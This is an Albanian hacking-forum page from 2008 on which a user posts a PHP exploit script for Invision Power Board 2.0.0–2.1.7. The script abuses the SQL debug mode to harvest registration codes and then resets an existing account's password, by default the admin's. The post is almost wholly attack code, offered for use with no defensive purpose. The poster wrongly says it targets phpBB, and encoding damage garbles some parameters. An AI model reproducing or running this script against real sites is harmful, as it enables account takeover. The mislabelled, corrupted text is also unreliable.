Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
ForumPortaliGalleryKėrkoLatest imagesRegjistrohuidentifikimi
...:::Meny Kryesore:::...
 Home
 Portali
 Forum
 Lista e Antarve
 Galeria
 Lajmet Flash
 Profili
 FAQ
 Testi I Dashuris
favoritos.gif Media & Muzika
 Telivizionet Live
 Video Klipe
 Ruzulltatet Sportive
 Mp3 Falass
 Mp3 RAP
 Kerkesa Muzikore
 Melodi Per Celular
icon_community.gif Argėtim-Zbavitje
 Video Humoristike
 Luani Lojra
 Dezing
 Poezi
 Gediche
 Argėtime
 Albumi Fotografik
 Tema tė Ndryshme
som_downloads.gif Shkarkime & Links
King-Rap Tolbar
Programe
Shkarko Scripte
Chat Programs
 Kėrko nė Forum
 Liderėt e forumit
 Ndihmė
 Kėrko
Moti Momental

Permbajta e ksaj faqe kerkon flash player per instalim kliko mbi ket tekst.


Futu nė chat
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Chatzl10
Top 5 softuerėt antivirus pėr 2008
HTML clipboard
Top 5 softuerėt antivirus pėr 2008

1. Bit Defender

2. Kaspersky

3. Eset NOD32

4. Trend Micro Antivirus

    plus AntiSpyware 

5. F-Secure Anti-Virus 

Gallery
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Empty
SMS Falas nga KING-RaP
Partnerėt
>>> AlBaZeMeR <<<

XoFaCe

->>Ks-MaX <<<---

->> KoSoVa.Li <<<---

 ->> Muzik-Anglisht <<<---

V.I.P Galeri

Top posters
kanuni
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
Xhebraili
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
vissari
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
El-Fuego
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
drini-89
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
RiRi
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
dj-baba
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
dosti
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
king
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
miri
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_lcapExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Voting_barExploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Vote_rcap 
Keywords
Gashi Meda
IP Addressa Juaj&Reklama
IP


 

 Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7

Shko poshtė 
AutoriMesazh
El-Fuego




Numri i postimeve : 159
Join date : 12/06/2008
Age : 111
Location : Peja Morder City

Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Empty
MesazhTitulli: Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7   Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7 Icon_minitimeThu Jun 12, 2008 4:06 pm

Shikoni kete exploit e gjeta eshte per Hack Phbb


Kodet PHP:


______________________________________________________________________________________________________________________

// -----------------------------
//Debug Mode password change vulnerability
//Affects Invision Power Borard 2.0.0 to 2.1.7
//by Rapigator

//This works if:

//"Debug Level" is set to 3
//or
//Enable SQL Debug Mode is turned on

//In General Configuration of the forum software.


// The forum's address up to and including 'index.php'
$site = "http://localhost/forums/index.php";

// An existing user's login name
$name = "admin";

// The new password(3-32 characters)
$pass = "1234";

// You can use a proxy...
// $proxy = "1.2.3.4:8080";



// -----------------------------
$site .= "?";
$suffix = "";
$name = urlencode($name);
$pass = urlencode($pass);
$curl = curl_init($site.'act=Reg&CODE=10');
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT<\/span> INTO ([\\w]*?)_reg_antispam<\/span> \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
} else {
$suffix = "&debug=1";
$curl = curl_init($site.'act=Reg&CODE=10'.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT INTO ([\\w]*?)_reg_antispam \\(regid,regcode,ip_address,ctime\\) VALUES\\(\'([\\w]{32}?)\',([\\d]*?),/', $page, $regs)) {
$prefix = $regs[1];
$regid = $regs[2];
$regcode = $regs[3];
}
}
if (!isset($regid) || !isset($regcode)) {
echo "Error: Probably not vulnerable, or no forum found";
exit;
}

$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=11&member_name={$name}®id={$r egid }®_code={$regcode}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
if (preg_match('/INSERT<\/span> INTO '.$prefix.'_validating<\/span> \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}
if (preg_match('/INSERT INTO '.$prefix.'_validating \\(vid,member_id,real_group,temp_group,entry_date, coppa_user,lost_pass,ip_address\\) VALUES\\(\'([\\w]{32}?)\',([\\d]{1,32}?),/', $page, $regs)) {
change_pass($regcode,$regid,$regs[1],$regs[2]);
}

function change_pass($regcode,$regid,$vid,$userid) {
global $site, $proxy, $name, $pass;
$curl = curl_init($site.$suffix);
curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, "act=Reg&CODE=03&type=lostpass&uid={$userid}&a id={ $vid}®id={$regid}®_code={$regcode}&pass1={$p ass}&pass2={$pass}");
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
$page = curl_exec($curl);
curl_close($curl);
echo "Password Changed!";
exit;
}
?>
_____________________________________________________________________________________________________________________
Mbrapsht nė krye Shko poshtė
 
Exploit |Hack Invision Power Borard 2.0.0 to 2.1.7
Mbrapsht nė krye 
Faqja 1 e 1
 Similar topics
-
» WebPortal CMS 0.6-beta Remote Password Change Exploit
» All The Exploit For Get Shopadmin
» Port Flooder Exploit
» Nukedit 4.9.x Remote Create Admin Exploit
» BlogPHP 2.0 Remote Privilege Escalation Exploit

Drejtat e ktij Forumit:Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi
 :: ..:: INFORMATIKA ::.. :: Exploits-
Kėrce tek: